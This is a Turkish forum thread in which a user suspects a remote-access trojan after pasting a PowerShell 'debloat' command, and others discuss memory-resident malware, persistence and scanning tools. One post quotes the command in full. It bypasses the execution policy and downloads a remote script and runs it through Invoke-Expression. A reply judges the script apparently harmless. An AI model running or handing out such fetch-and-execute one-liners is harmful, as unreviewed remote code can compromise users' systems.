RAT yedim

blaskox · 7 Şubat 2024

YunusEmre_S38 dedi:
Hocam sitedeki kullanıcı bu = YurinDoctrine - Overview
Güvenilir hesabada benziyor ama bilemiyorum nasıl oldu bu.

Bana başta linkin sonundaki parantezi kaldırıp yapıştırmamı söyledi. Öyle yaptığımda hiçbir şey olmadı. Sonra parantezi geri koyup yapıştırdığımda oldu.

YunusEmre_S38 · 7 Şubat 2024

blaskox dedi:
Bana başta linkin sonundaki parantezi kaldırıp yapıştırmamı söyledi. Öyle yaptığımda hiçbir şey olmadı. Sonra parantezi geri koyup yapıştırdığımda oldu.

Olan olmuş zaten onlan alakalı değildir.

Klaizee · 7 Şubat 2024

Deva Bulmam dedi:
Yarı hatalı yarı doğru denilebilir. Çeşitli virüslerin bilgisayarda hiçbir dosyası bulunmayıp sadece bellekte çalışabiliyor. Tabii bunu tespit etmek çok da zor bir şey olmayacaktır.

-Farklı farklı tarama araçlarıyla bellek taramaları gerçekleştirmek, (ESET Online Scanner, F-Secure Online Scanner, Emsisoft Emergency Kit, Malwarebytes Free vb.)
-ESET SysInspector veya Kaspersky GSI ile sistem dökümü oluşturmak,
-Autoruns, ProcessExplorer gibi programlar aracılığıyla incelemeler yapmak.

Yüzde 100 olamayacak olsa da yüksek ihtimalle bu 3 şey ile bellekte çalışan virüsler tespit edilebilir.

Tamam, virüs RAM'e sızdı diyelim. PC kapanıp açıldığında RAM içindeki verilerin sıfırlanmış olmasına ne açıklaman var?

Deva Bulmam · 7 Şubat 2024

Klaizee dedi:
Tamam, virüs RAM'e sızdı diyelim. PC kapanıp açıldığında RAM içindeki verilerin sıfırlanmış olmasına ne açıklaman var?

Startup zararlılarının amacı bu zaten. Sistem boot edilir edilmez virüs tekrardan RAM'de aktif oluyor. RAM'in verileri sıfırlansın yani önemli değil.

Klaizee · 7 Şubat 2024

Deva Bulmam dedi:
Startup zararlılarının amacı bu zaten. Sistem boot edilir edilmez virüs tekrardan RAM'de aktif oluyor. RAM'in verileri sıfırlansın yani önemli değil.

Arkadaş sisteme format atmış, startup nerde yaşayacak?

ShadowFighter · 7 Şubat 2024

blaskox dedi:
Herkese selam, PowerShell'e gereksiz uygulamaları kapattığı gerekçesiyle bir kod yapıştırdım. Yeniden başlattığımda, yüksek CPU kullanımı ve donmalar gördüm. Mikrofonum kapalı kullanıyordum. "mikrofonunuz gizlilik ayarlarınız sebebiyle açılamadı." bildirimi geldi, RAT olduğundan şüphelenip hemen internetsiz formatla Windows'u baştan kurdum. Formattan sonra bilgisayarımı açtığımda aynı sorunların devam ettiğini gördüm. Malwarebytes ile tarama yaptığımda herhangi bir virüs bulamadım. Yardımcı olabilirseniz çok sevinirim. Herkese iyi sosyaller

Hocam gerekenden fazlasını yapmışsınız zaten.

Deva Bulmam · 7 Şubat 2024

Klaizee dedi:
Arkadaş sisteme format atmış, startup nerde yaşayacak?

Genel olarak konuştum, konu sahibi için değil. Ayrıca bazı Rootkitler formatla da gitmez.

YunusEmre_S38 · 7 Şubat 2024

Arkadaş kodu bende yapıştırıp deneyesim var.

blaskox · 7 Şubat 2024

YunusEmre_S38 dedi:
Arkadaş kodu bende yapıştırıp deneyesim var.

Hiç bulaşmayın derim

Klaizee · 7 Şubat 2024

blaskox dedi:
Atmam yanlış mı bilmiyorum ama. Kod;
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force; Start-BitsTransfer -Source "https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/ooshutup.cfg"; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; Invoke-Expression ((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/YurinDoctrine/Fresh-Script-Lite/main/Fresh-Lite/Lite.ps1'))

Kodlarda kısa bi inceleme ile bir sorun görmedim, O&O ShutUp10 yazılımını çalıştırıyor, OneDrive gibi programları kaldırıyor. Bu olay yüzünden değil de bu olay olduğu ara denk geldiği için bundan olmuş sanıyor olabilir misiniz?

RAT yedim

Ayrıntılı düzenleme

blaskox

Zeptopat

YunusEmre_S38

Centipat

Klaizee

Hectopat

Deva Bulmam

Decapat

Klaizee

Hectopat

ShadowFighter

Kilopat

Deva Bulmam

Decapat

YunusEmre_S38

Centipat

blaskox

Zeptopat

Klaizee

Hectopat

Benzer konular

Yeni konular

Yeni mesajlar

Gizliliğinize önem veriyoruz